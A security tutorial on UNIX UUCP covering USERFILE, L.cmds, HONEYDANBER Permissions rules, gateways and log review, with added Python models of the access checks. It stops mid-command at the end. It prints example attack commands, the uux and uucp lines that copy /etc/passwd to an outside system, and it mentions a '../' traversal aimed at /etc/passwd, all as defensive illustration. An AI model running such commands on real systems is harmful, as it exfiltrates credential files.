Linux server security
1. UUCP System Overview
UUCP is a set of programs that transfer files between UNIX systems, execute commands on remote systems, and perform system maintenance, usage accounting and security functions. UUCP is the most widely used networking utility on UNIX systems, for two reasons: first, UUCP is the only standard networking system available on every version of UNIX; second, UUCP is the cheapest networking system, since a single cable connecting two systems is enough to establish a UUCP link. If data must be transmitted between two systems hundreds or a thousand kilometres apart, two modems with dialing capability are required.
(1) The uucp command
The first UUCP command is uucp, which transfers files between two systems. Its format is similar to that of the cp command, except that uucp also allows users to copy files between systems. The general form of the command is:
uucp source_file destination_file
source_file is usually (but not necessarily) a file on this system; destination_file is usually a file or directory on another system, written in the form:
system!filename or system!directory
uucp gives the system administrator an option to restrict incoming and outgoing uucp file transfers to the directory tree under /usr/spool/uucppublic. If you ask uucp to store a transferred file in another directory, the system sends back the message: remote access to path/file denied. uucp allows the abbreviation ~ in place of /usr/spool/uucppublic/, for example:
uucp names remote!~/john/names
uucp can also be used to copy a file from another system to this one: the file on the other system is simply named as the source file (in the system!file form), like this:
uucp remote!/usr/john/file1 file1
If the remote machine restricts the directories from which files may be transferred, this command will not copy the file. The safest way to copy a file to this system is to transfer it through the uucppublic directory on both systems:
uucp remote!~/john/file1 ~/pat/file1
(2) The uux command
The uux command is used to execute commands on another system, a feature called "remote command execution". The most common use of uux is sending mail between systems (mail runs uux internally). A typical uux request looks like this:
pr listing | uux - "remote1!lp -d pr1"
This command formats the file listing and then prints it on the printer pr1 attached to the system remote1. The "-" option makes the standard input of uux the standard input of the remote command. When only one of several systems has a printer attached, uux is commonly used to print files.
The commands that may be executed remotely must of course be strictly limited in order to protect the security of the system. For example, the system should not allow users on other systems to run the following command:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
This command would make your system send its /etc/passwd file to the system outside. In general, only a few commands are permitted. rmail (the restricted mail program) is the one command that is almost always allowed to be executed through uux; systems running netnews also allow rnews (the restricted offline netnews command), and systems that provide a printer allow lp.
(3) The uucico program
The uucp and uux commands do not themselves call the other system, transfer files or execute commands: they queue the user's request and start the uucico program. uucico does the actual communication work. It calls the other system, logs in, and transfers data (files or remote command execution requests). If the telephone line is busy or the other system is down, the transfer request stays in the queue, and a later run of uucico (usually started by cron) sends it.
uucico both sends and receives data. In this system's /etc/passwd file, the entries that other systems' uucico use to log in to this system specify uucico as the login shell in the shell field. Thus, when another system calls this system, it talks directly to uucico.
(4) The uuxqt program
When another system's uucico calls this system with a remote command execution request, this system's uucico queues the request and, before exiting, starts uuxqt to execute the queued remote command requests.
The following example illustrates how data is transferred. Suppose a user on this system sends mail to someone on the remote system remote1. mail runs uux, asking for the rmail program to be run on remote1 with the message as rmail's standard input. uux queues the transfer request and then starts uucico, which does the actual calling and data transmission. If remote1 answers, uucico logs in to remote1 and sends two files: the mail message and the uux command file, which is executed on remote1 by uuxqt; the command file contains the request to run rmail. If remote1 is down at the time of the transfer, uucico cannot log in and the files are not transferred, but cron periodically (every hour) starts uucico. uucico looks for data that has not yet been sent and, finding a uux transfer whose target system is remote1, tries to call remote1 again until the transfer succeeds. If after a certain number of days the transfer to remote1 still has not succeeded, the unsent message is returned to the sender as "undeliverable" mail.
2. UUCP Security Issues
A UUCP system on which no restrictions are set allows any user on an outside system to execute any command on this system and to copy in or out any file that the uucp user can read or write. Anyone using uucp in a particular environment should understand this point and set up the protection that is needed.
In UUCP, two programs deal with security. The first is uucico, which runs when this system calls another system or is called by one. This program is the key to the system's uucp security; it performs the transfer of files into and out of the system. The second program is uuxqt, which services all remote command execution requests.
(1) The USERFILE file
uucico uses the file /usr/lib/uucp/USERFILE to determine what may be sent to or received from remote systems. Its format is:
login,sys [c] path_name [path_name ...]
where login is the login name on this system, sys is the name of the remote system, c is the optional call-back flag, and path_name is a directory name.
When uucico runs as a login shell, it takes the remote system's name and the login name it used on this system and looks for the USERFILE line whose login and sys match. If that line contains the call-back flag c, uucico does not transfer files: it hangs up and calls the remote system back (any system can tell this system that its name is xyz, so this system hangs up and calls the real xyz to perform the file transfer). Without c, uucico performs the file transfers requested by the remote system; the pathnames of the files transferred must begin with one of the path_name entries.
Users need to know the following:
If the login name used by the remote system is not listed in the login field of any USERFILE line, uucico refuses to do anything for the other system and hangs up.
If the system name is not listed in the sys field, uucico uses the first USERFILE line that has a matching login name and an empty system name. For example, nuucp, /usr/spool/uucppublic applies to all systems that log in as nuucp, and cbuucp, c forces all systems that log in as cbuucp to be called back before their file transfer requests are performed. If the calling system's name matches none of the sys entries and there is no entry with an empty system name, uucico refuses to do anything.
If both machines set the call-back flag, file transfer requests are never executed: the two systems keep calling each other until one of them removes the call-back flag.
If a user's login name is listed in the login field of USERFILE, then when uucico calls another system to transfer files for that user, uucico transfers only files in the directories named by path_name. An empty login name applies to all users whose login is not explicitly listed in USERFILE. So
pat, /usr/pat
allows pat to transfer only files under the /usr/pat directory tree, and
, /usr/spool/uucppublic /tmp
allows everyone else to transfer only files in /usr/spool/uucppublic and /tmp. Do not allow uucico to copy files into or out of any directory other than /usr/spool/uucppublic, or someone may use a command like the following to copy important information off this system:
uucp yoursys!/etc/passwd to-creep
(2) The L.cmds file
uuxqt uses the file /usr/lib/uucp/L.cmds to determine which commands remote execution requests may run. The format of the file is one command per line. If uuxqt is to handle only electronic mail, the file consists of a single line naming the mail command.
The system administrator may allow users to run the netnews command (rnews) or the remote print command (lp), but must never allow commands that copy a file to standard output, such as cat, or network commands such as uucp; otherwise anyone need only type on their own system:
uux "yoursys!uucp yoursys!/etc/passwd (outside!~/passwd)"
and then wait for your system to send them the file.
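To make the two old-UUCP checks concrete, here is an added Python model (not code from this page or from UUCP itself) that parses a constructed USERFILE and L.cmds and answers the questions uucico and uuxqt ask: may this login and system move this path, and may this command run. The sample files, the system names outside and zuul, and the function names are assumptions for the example; the matching rules are the ones described above, with one extra defensive detail: the path is normalised before the prefix test, so a request dressed up as /usr/spool/uucppublic/../../../etc/passwd is judged as /etc/passwd.

```python
"""Model of old UUCP's two access checks: USERFILE (which paths uucico will
transfer for a given login and system) and L.cmds (which commands uuxqt will
run). Added example with constructed sample files; the matching rules follow
the description above, not the real uucico/uuxqt source."""
import os

# Constructed USERFILE (format: login,sys [c] path_name ...).
USERFILE = """\
nuucp, /usr/spool/uucppublic
cbuucp, c
zuul,zuul /usr/spool/uucppublic /usr/news
pat, /usr/pat
, /usr/spool/uucppublic /tmp
"""

# Constructed L.cmds: one permitted command per line.
L_CMDS = """\
rmail
rnews
lp
"""


def parse_userfile(text):
    """Return (login, sys, callback, paths) tuples, one per USERFILE line."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if not fields:
            continue
        login, _, system = fields[0].partition(",")
        callback = len(fields) > 1 and fields[1] == "c"
        paths = fields[2:] if callback else fields[1:]
        entries.append((login, system, callback, paths))
    return entries


def find_entry(entries, login, system):
    """Exact login+sys match first, then the first line with that login and an
    empty sys (uucico's fallback when the calling system is not listed)."""
    for entry in entries:
        if entry[0] == login and entry[1] == system:
            return entry
    for entry in entries:
        if entry[0] == login and entry[1] == "":
            return entry
    return None


def path_allowed(paths, path):
    """True if path lies under one of the permitted directories. normpath
    collapses '..', so the prefix test cannot be escaped with '../'."""
    wanted = os.path.normpath(path)
    for p in paths:
        p = os.path.normpath(p)
        if wanted == p or wanted.startswith(p.rstrip("/") + "/"):
            return True
    return False


def check_remote_transfer(entries, login, system, path):
    """A remote system logged in as `login`, claiming to be `system`, asks
    uucico to move `path`. Returns 'allow', 'callback' or a denial reason."""
    entry = find_entry(entries, login, system)
    if entry is None:
        return "deny: no matching USERFILE line, hang up"
    _, _, callback, paths = entry
    if callback:
        return "callback"  # hang up and call the real system back
    if path_allowed(paths, path):
        return "allow"
    return "deny: remote access to path/file denied"


def check_local_transfer(entries, user, path):
    """A local user queues a transfer: use the user's own line, otherwise the
    line with an empty login name."""
    entry = find_entry(entries, user, "") or find_entry(entries, "", "")
    if entry is None or not path_allowed(entry[3], path):
        return "deny: remote access to path/file denied"
    return "allow"


def check_remote_command(lcmds_text, request):
    """uuxqt executes a request only if its command word is listed in L.cmds."""
    allowed = {line.strip() for line in lcmds_text.splitlines() if line.strip()}
    words = request.split()
    return bool(words) and words[0] in allowed
```

Running the checks against the sample files shows the behaviour the text describes: a nuucp login from any system may only touch the uucppublic tree, a cbuucp login is always called back, and a request such as uucp yoursys!/etc/passwd is refused by L.cmds as well as by USERFILE.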
(3) uucp logins
The UUCP system requires two login accounts: one for other systems to log in with, and one used to administer the system. For example, if the data transfer login is nuucp and the administrative login is uucp, the /etc/passwd file should contain two corresponding lines.
UID and GID 5 are often reserved for uucp. Since uucico runs SUID to the administrative login, the nuucp account should use different UID and GID values.
(4) uucp files and directories
/usr/lib/uucp holds the uucp programs that users cannot run directly, such as uuxqt and uucico. This directory also contains the files that determine how uucp behaves, such as L.cmds and USERFILE. These files should be writable only by the uucp administrative account (system administrators do not want users changing the table of remotely executable commands). From a security standpoint, another file in this directory that the system administrator must understand is L.sys, which contains one entry for each system uucico can call; each entry includes the telephone number, login name and unencrypted password that uucico uses to call that system. Needless to say, L.sys should be owned by the uucp administrative account and have mode 400 or 600.
uucp uses the directory /usr/spool/uucp for its working files. Files whose names begin with C. are command files to be sent to other systems; they contain requests to copy data to or from other systems and to execute commands. Files whose names begin with D. are the data files for the C. files. Files whose names begin with X. are remote execution requests from other systems, interpreted by uuxqt. Files whose names begin with TM. are temporary files used while data is being transferred from other systems to this one. .XQTDIR is the directory uuxqt uses while executing X. files. LOGFILE helps in managing uucp security: it contains information about the success of uucp requests. The system administrator should look at this file regularly to learn which systems logged in to this system to execute uucp requests, what those requests were, and in particular whether any of them tried to do something that is not permitted.
There are two main versions of UUCP. The first was released with UNIX System V and is referred to in this section as old UUCP; the other is called HONEYDANBER UUCP and was also released by AT&T.
HONEYDANBER UUCP has a number of improvements over old UUCP:
Support for more dialers and networks:
intelligent autodial modems as well as the standard AT&T 801 autodialer;
networks such as DATAKIT VCS, UNET/ETHERNET, 3COM/ETHERNET, SYTEK and TCP (on BSD UNIX systems);
dialers connected to a LAN;
X.25 permanent virtual circuits (with the X.25 protocol).
The /usr/spool/uucp directory is reorganized: it contains one subdirectory for each remote system.
The USERFILE and L.cmds files are combined into a single file, Permissions.
The commands that may be executed remotely can be specified on a per-system basis.
Incoming and outgoing files can be controlled.
The default security settings are very strict.
(1) Differences between HONEYDANBER UUCP and old UUCP
In HONEYDANBER UUCP the file /usr/lib/uucp/Systems replaces old UUCP's /usr/lib/uucp/L.sys. The directory /usr/spool/uucp/.Log replaces old UUCP's file /usr/spool/uucp/LOGFILE. The /usr/spool/uucp/.Log directory contains the subdirectories uucico, uucp, uux and uuxqt, holding the log files of the corresponding commands; in each of them there is one log file per recently active remote system (log files are usually kept in those directories for one week).
If a remote system that calls this system is not listed in the Systems file, uucico does not allow that remote system to do anything, but starts the shell script /usr/lib/uucp/remote.unknown. The default version of this script supplied with UUCP records the login time, date and name of the remote system in the file /usr/spool/uucp/.Admin/Foreign. Making remote.unknown non-executable disables this refusal, giving the same behaviour as old UUCP.
The C., D., X., TM. and other files are stored in separate subdirectories of /usr/spool/uucp, each named after the corresponding remote system.
In HONEYDANBER UUCP, USERFILE and L.cmds are merged into a new file, /usr/lib/uucp/Permissions, which provides a more flexible way of granting access to outside systems. The file defines a table of rules that are consulted for the various systems. The rules and their formatting options are as follows:
rule=list option=yes|no option=list ...
where rule is a login name or machine name, list is a colon-separated list (its contents depend on the rule or option), and option is one of the options discussed below, which takes either a list or a yes/no value that allows or disallows an action.
(2) LOGNAME rules
LOGNAME rules control uucico when it is started as a login shell.
LOGNAME=nuucp specifies the default restrictions for all systems that log in to the nuucp account:
1. A remote system can only send files into the /usr/spool/uucppublic directory.
2. A remote system cannot request any files.
3. Files queued for the remote system are sent only when uucico calls the remote system. This is the only way for uucico to identify the remote system accurately (any system can call this system and claim to be xyz).
4. The commands uuxqt will execute in the name of the remote system are the default commands; these default commands (usually only rmail and rnews) are defined at compile time.
Several login accounts used by other systems' uucico can be given, separated by colons: LOGNAME=nuucp:xuucp:yuucp. Any UUCP login request from a system whose login has no LOGNAME rule is rejected (the calling system is told to "get lost" and the connection is dropped). A single LOGNAME rule is enough to get a HONEYDANBER UUCP system running: in fact, as delivered, the Permissions file contains a LOGNAME rule with no options that applies to every /etc/passwd entry whose login shell field is /usr/lib/uucp/uucico.
Several options can be used to override the default restrictions; they can be combined to allow or restrict various operations. The WRITE option specifies one or more directories or files into which files may be written, instead of only the /usr/spool/uucppublic directory:
LOGNAME=nuucp WRITE=/
This rule allows files to be written into any directory; restrictions 2 to 4 remain in effect. Note: a remote UUCP request may overwrite any file to which the uucp account has write permission. Several writable directories are separated by colons:
LOGNAME=nuucp WRITE=/usr:/floppy
This rule allows the remote system to write files into the /usr and /floppy directories. The REQUEST=yes option allows a remote system to copy files from this system:
LOGNAME=nuucp REQUEST=yes
The files that may be copied can only be in the /usr/spool/uucppublic directory; restrictions 1, 3 and 4 remain in effect. To allow remote systems to copy files from other directories, use the READ option:
LOGNAME=nuucp REQUEST=yes READ=/usr
This rule allows remote systems to copy any other-readable file under the /usr directory. As with the WRITE option, several directories can be specified. The SENDFILES=yes option allows uucico to send the files queued for the remote system when the remote system calls this system:
LOGNAME=nuucp SENDFILES=yes
Restrictions 1, 2 and 4 remain in effect. The CALLBACK=yes option forces any system that logs in to the specified account to be called back. Note: other options listed together with CALLBACK=yes are ignored.
The NOREAD and NOWRITE options can be used together with the READ and WRITE options. Directories named in the NOREAD option are exceptions to the READ option (that is, directories under a READ directory that the remote system cannot request), for example:
LOGNAME=nuucp REQUEST=yes READ=/ NOREAD=/etc
This rule allows remote systems to request any other-readable file on this system except files under /etc. NOWRITE is used with WRITE in the same way.
Generally, the default restrictions should not be changed much. If this system calls another system and the administrator has no way of apportioning the telephone charges, the SENDFILES option can be used to lift the restriction for some machines; a uucico login account should be created for use only by those machines, for example:
LOGNAME=nuucp SENDFILES=yes
LOGNAME=trusted SENDFILES=yes REQUEST=yes READ=/ WRITE=/
The rules above give systems logging in to the trusted account access to other files on this system. The nuucp password is given to the administrator of every system that wants to establish a uucp connection with this system; the trusted password is given only to the administrators of trusted systems. A system that has both trusted and untrusted uucp accounts should preferably create separate public directories for them with the PUBDIR option, which lets the system administrator change uucico's notion of the public directory (the default is /usr/spool/uucppublic), for example:
LOGNAME=nuucp SENDFILES=yes REQUEST=yes \
PUBDIR=/usr/spool/uucppublic/nuucp
LOGNAME=trusted SENDFILES=yes REQUEST=yes READ=/ WRITE=/ \
PUBDIR=/usr/spool/uucppublic/trusted
The PUBDIR options above place the public files of the nuucp and trusted logins in different directories. This prevents untrusted systems that log in as nuucp from copying files into or out of the public directory of the trusted systems (note: the options above allow nuucp to request file transfers). A trailing backslash indicates that the next line is a continuation of the current line. The MYNAME option gives a system name to be used for a system that logs in to the account:
LOGNAME=Xuucp MYNAME=IOnker
(3) MACHINE rules
MACHINE rules override the default restrictions: by naming a list of systems in a MACHINE rule, you can change the default restrictions that apply when uucico calls those systems. The READ, WRITE, REQUEST, NOREAD, NOWRITE and PUBDIR options work as for LOGNAME rules; the CALLBACK and SENDFILES options are ignored. The MYNAME option, which must be combined with a LOGNAME rule, defines the name this system uses when it is called; in a MACHINE rule it defines the name used only when this system calls. The format of a MACHINE rule is:
MACHINE=zuul:gozur:enigma WRITE=/ READ=/
This rule allows the remote systems zuul, gozur and enigma to send to, or request from, this system any file that is other-writable or other-readable. Generally, remote systems should not be allowed to read or write files in directories other than /usr/spool/uucppublic, so MACHINE rules should be created only for the systems you trust. The system name OTHER in a MACHINE rule stands for all other systems. The COMMANDS option changes the default table of commands that uuxqt executes for remote command execution requests:
MACHINE=zuul COMMANDS=rmail:rnews:lp
This rule allows the system zuul to request remote execution of the commands rmail, rnews and lp. uucico does not use this option; uuxqt uses it to decide which commands it will execute in the name of the system. The PATH that uuxqt uses to find the commands named in the COMMANDS option is set when uuxqt is compiled, usually to /bin:/usr/bin. Giving a full pathname in the COMMANDS option overrides the default PATH:
MACHINE=zuul COMMANDS=rmail:/usr/local/bin/rnews:lp
As with old UUCP, a HONEYDANBER UUCP system should not allow remote systems to run commands such as uucp or cat that can read or write arbitrary files; running them threatens local security.
Although the local system has certain procedures for checking the remote system's name, any remote system calling the local system can claim to be "xyz", and the local system will believe it. So although the local system may allow only zuul to run the lp command, in practice any system claiming to be zuul is also allowed to run lp. There are two ways of confirming a system's identity. One is to refuse the call and call the system back, using CALLBACK=yes; as long as the telephone or network lines are not tampered with, the local system can then positively confirm the identity of the remote system. The other is the VALIDATE option of the LOGNAME rule. If some systems must be allowed to run "dangerous" commands, the COMMANDS and VALIDATE options can be combined. VALIDATE in a LOGNAME rule specifies that the named systems must log in under the login account given by LOGNAME:
LOGNAME=trusted VALIDATE=zuul
MACHINE=zuul COMMANDS=rmail:rnews:lp
When a remote system claiming to be zuul logs in, uucico checks the Permissions file and finds the rule LOGNAME=trusted VALIDATE=zuul. If the remote system logged in with the account trusted, uucico accepts that the system really is zuul and continues; otherwise uucico treats the system as an impostor and refuses its requests. As long as only zuul has the password of the trusted account, other systems cannot impersonate it. VALIDATE is effective only if the login password is kept confidential and is not disclosed to the administrators of untrusted or insecure systems; if the trusted system's login password leaks, any system can masquerade as the trusted system. Specifying ALL in the COMMANDS option allows remote execution of any command requested. Therefore never use ALL! ALL in effect gives every user on the remote system an account on your system.
(4) Combining MACHINE and LOGNAME rules
MACHINE and LOGNAME rules can be combined on one line to ensure a uniform security policy whether the remote system calls the local system or the local system calls the remote system:
LOGNAME=trusted MACHINE=zuul:gozur VALIDATE=zuul:gozur \
REQUEST=yes SENDFILES=yes \
READ=/ WRITE=/ PUBDIR=/usr/spool/trusted \
COMMANDS=rmail:rnews:lp:daps
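The LOGNAME, MACHINE, VALIDATE and COMMANDS behaviour described in sections (2) to (4) can be checked against a draft Permissions file before it is installed. The following Python evaluator is an added example (not uucico or uuxqt code, and not from this page); the sample Permissions contents, the system names zuul, gozur and outside, the login names nuucp and trusted, and the function names are assumptions. It applies the LOGNAME defaults (write only to PUBDIR, no REQUEST, no SENDFILES), READ/WRITE with NOREAD/NOWRITE exceptions, the VALIDATE impostor check, and the per-MACHINE COMMANDS table with OTHER and ALL, and it normalises paths before the prefix test so '..' cannot escape a READ or WRITE directory.

```python
"""Evaluator for HONEYDANBER UUCP Permissions rules as described above.
Constructed model, not the real uucico/uuxqt code, for checking a rule set
before it is installed."""
import os

DEFAULT_PUBDIR = "/usr/spool/uucppublic"
DEFAULT_COMMANDS = ["rmail", "rnews"]   # compiled-in default per the text

# Constructed sample Permissions file (backslash continues a line).
PERMISSIONS = """\
LOGNAME=nuucp
LOGNAME=trusted VALIDATE=zuul:gozur REQUEST=yes SENDFILES=yes \\
    READ=/ NOREAD=/etc WRITE=/usr/spool/uucppublic/trusted \\
    PUBDIR=/usr/spool/uucppublic/trusted
MACHINE=zuul:gozur COMMANDS=rmail:rnews:/usr/local/bin/lp
MACHINE=OTHER COMMANDS=rmail
"""


def parse_permissions(text):
    """Join backslash-continued lines, then split each rule into OPTION=value
    pairs; list-valued options are colon separated and split later."""
    rules = []
    for line in text.replace("\\\n", " ").splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        rule = {}
        for token in line.split():
            key, _, value = token.partition("=")
            rule[key] = value
        rules.append(rule)
    return rules


def _lst(rule, key, default=None):
    """Colon-separated list option, or the default when the option is absent."""
    return rule[key].split(":") if key in rule else list(default or [])


def incoming_call(rules, login, claimed):
    """Model uucico started as a login shell. Returns the effective permissions
    for the call, None if the login has no LOGNAME rule, or 'impostor' when
    the claimed system name is VALIDATEd to a different login."""
    for r in rules:
        if "LOGNAME" in r and claimed in _lst(r, "VALIDATE") \
                and login not in _lst(r, "LOGNAME"):
            return "impostor"
    for r in rules:
        if "LOGNAME" in r and login in _lst(r, "LOGNAME"):
            pub = r.get("PUBDIR", DEFAULT_PUBDIR)
            return {
                "request": r.get("REQUEST", "no") == "yes",
                "sendfiles": r.get("SENDFILES", "no") == "yes",
                "callback": r.get("CALLBACK", "no") == "yes",
                "read": _lst(r, "READ", [pub]),
                "noread": _lst(r, "NOREAD"),
                "write": _lst(r, "WRITE", [pub]),
                "nowrite": _lst(r, "NOWRITE"),
            }
    return None


def _under(path, dirs):
    """True if the normalised path is one of dirs or lies beneath one."""
    p = os.path.normpath(path)   # turns pub/../../../etc/passwd into /etc/passwd
    for d in dirs:
        d = os.path.normpath(d)
        if p == d or p.startswith(d.rstrip("/") + "/"):
            return True
    return False


def file_request_allowed(perm, path):
    """Remote asks for a file from this system: needs REQUEST=yes and a path
    under READ that is not under NOREAD."""
    return perm["request"] and _under(path, perm["read"]) \
        and not _under(path, perm["noread"])


def file_write_allowed(perm, path):
    """Remote sends a file to this system: path under WRITE, not under NOWRITE."""
    return _under(path, perm["write"]) and not _under(path, perm["nowrite"])


def command_allowed(rules, system, command):
    """Model uuxqt: the COMMANDS list of the MACHINE rule naming the system
    (else the OTHER rule, else the compiled-in default) decides. ALL permits
    everything, which is why the text says never to use it."""
    chosen = None
    for r in rules:
        machines = _lst(r, "MACHINE")
        if system in machines:
            chosen = r
            break
        if "OTHER" in machines and chosen is None:
            chosen = r
    cmds = _lst(chosen, "COMMANDS", DEFAULT_COMMANDS) if chosen else DEFAULT_COMMANDS
    if "ALL" in cmds:
        return True
    return command in cmds or command in {os.path.basename(c) for c in cmds}
```

With the sample rules, a caller that logs in as nuucp but announces itself as zuul is reported as an impostor, because zuul is VALIDATEd to the trusted login; a genuine trusted login may request /usr/lib/uucp/Systems but not /etc/passwd (NOREAD); and a system with no MACHINE rule of its own falls through to the OTHER rule and may only run rmail.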
(5) The uucheck command
Once a Permissions file has been written, the command uucheck -v shows how uucp interprets the file. The first few lines of its output confirm that all the files and directories used by the HONEYDANBER UUCP commands are present; the Permissions file is then examined.
(6) Gateways
A gateway machine can be set up to route mail. A gateway is a system that does nothing but forward mail to other systems. With a gateway, a department or company with many UNIX systems can set up a single e-mail address for all its users: all mail is sent through the gateway, which forwards it to the appropriate machine. A gateway can also be used to enhance security: the modem can be connected to the gateway, and all other systems route their mail through the gateway, communicating with it over a LAN or hard-wired lines. The telephone numbers, uucp login accounts and passwords of the local systems then need not be given to anyone outside the group; if necessary, the gateway can be the only system connected to a modem. Establishing a simple gateway is easy: for each user login on each system to which mail is to be routed, put a line of the form
forward to system!login
in the gateway's file /usr/mail/login. Mail sent to login on the gateway is then forwarded to the account login on system. Two different login levels on the gateway can be used to establish a level of security management. The gateway password must not be guessable, and the gateway should do as little as possible other than transfer mail. Important data should not be stored on the gateway machine; routine security checks should be made daily, and the uucp logins on the gateway should be checked carefully. A gateway also provides an entry point for intruders: someone who breaks into the gateway gains access to the other local systems and to the systems reached over its communication lines, and the gateway's uucp Systems file contains information about the other local systems that will be of great use to an intruder trying to break into them. So when establishing a gateway, make it as watertight as possible.
uucp connections can be set up so that the local systems regularly call the gateway to collect mail and the gateway never needs to call the local systems. This at least prevents an intruder on the gateway from breaking into the local systems. Use the Permissions file on the local systems to restrict the gateway's behaviour to the bare minimum, namely forwarding mail. This prevents an eavesdropper from using the gateway to obtain other files from the local systems.
(7) Checking the log files
HONEYDANBER UUCP automatically mails login information to the uucp account; the uucp administrator should read this mail regularly. The system administrator should check for large numbers of unsuccessful requests, especially requests from other systems for files on this system, and for remote command execution requests that are not permitted. The login information is also stored in files; to look at it, use the grep command. The file /usr/spool/uucp/.Log/uucico/system contains the uucico log for system, and /usr/spool/uucp/.Log/uuxqt/system contains the uuxqt log for system. The following command prints all commands executed by uuxqt except rmail:
grep -v rmail /usr/spool/uucp/.Log/uuxqt/*
The following command prints all requests by remote systems for files on this system:
grep -v REMOTE /usr/spool/uucp/.Log/uucico/* | grep "
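The log review described above can be turned into a small audit script that runs over the .Log files. The following Python is an added example, not code from this page or from UUCP: the one-record-per-line layout "system login (date) text" and the sample records are constructed for the example and are not the real .Log format, so the regular expression would need adjusting to a real system's logs. The system names zuul, outside and bogus, the allowed-command set and the function names are likewise assumptions. It reproduces the effect of grep -v rmail on the uuxqt log, flags any executed command outside the permitted set, lists denied remote file requests, and counts failed or denied records per calling system so a single persistent caller stands out.

```python
"""Audit checks over uuxqt and uucico log records, in the spirit of the grep
commands above. The record layout and the sample lines are constructed for
this example and are not the real .Log format."""
import re
from collections import Counter

ALLOWED_COMMANDS = {"rmail", "rnews", "lp"}   # what uuxqt is meant to run

# Assumed layout: "system login (date) text"; adjust for real log files.
RECORD = re.compile(r"^(?P<system>\S+) (?P<login>\S+) \((?P<when>[^)]*)\) (?P<text>.*)$")

# Constructed uuxqt records: the text is the command line that was run.
UUXQT_LOG = """\
zuul trusted (4/12-09:01:10) rmail john
zuul trusted (4/12-09:02:55) lp -d pr1
outside nuucp (4/12-11:20:03) rmail pat
outside nuucp (4/12-11:21:47) uucp yoursys!/etc/passwd outside!~/passwd
outside nuucp (4/12-11:22:01) cat /etc/passwd
"""

# Constructed uucico records: connection and transfer events.
UUCICO_LOG = """\
zuul trusted (4/12-09:00:58) OK (startup)
zuul trusted (4/12-09:01:02) REMOTE REQUESTED (zuul!D.zuul0123 --> yoursys!~/trusted/D.zuul0123)
outside nuucp (4/12-11:20:00) OK (startup)
outside nuucp (4/12-11:20:30) REMOTE ACCESS DENIED (REQUEST yoursys!/etc/passwd)
outside nuucp (4/12-11:20:31) REMOTE ACCESS DENIED (REQUEST yoursys!/usr/lib/uucp/Systems)
bogus nuucp (4/12-13:05:11) CONN FAILED (LOGIN FAILED)
"""


def parse_log(text):
    """One dict per well-formed record; lines that do not match are skipped."""
    return [m.groupdict() for m in map(RECORD.match, text.splitlines()) if m]


def _command(record):
    """First word of the record text, i.e. the command uuxqt executed."""
    words = record["text"].split()
    return words[0] if words else ""


def non_rmail_commands(text):
    """Like 'grep -v rmail' on the uuxqt log: every executed command other
    than rmail, as (system, command line)."""
    return [(r["system"], r["text"]) for r in parse_log(text)
            if _command(r) != "rmail"]


def disallowed_commands(text, allowed=ALLOWED_COMMANDS):
    """Commands outside the allowed set. Any hit means the COMMANDS table (or
    L.cmds on old UUCP) lets through something it should not."""
    return [(r["system"], r["text"]) for r in parse_log(text)
            if _command(r) not in allowed]


def denied_requests(text):
    """uucico records in which a remote request for a local file was refused,
    as (system, login, record text)."""
    return [(r["system"], r["login"], r["text"]) for r in parse_log(text)
            if "DENIED" in r["text"]]


def failures_per_system(text):
    """Count failed or denied records per calling system, so a caller that
    keeps probing stands out from normal traffic."""
    return dict(Counter(r["system"] for r in parse_log(text)
                        if "FAILED" in r["text"] or "DENIED" in r["text"]))
```

On the sample records, disallowed_commands reports the two uuxqt executions from outside that should never have been permitted, and failures_per_system shows outside with two denied requests and bogus with a failed login, which is exactly the pattern the text says to look for.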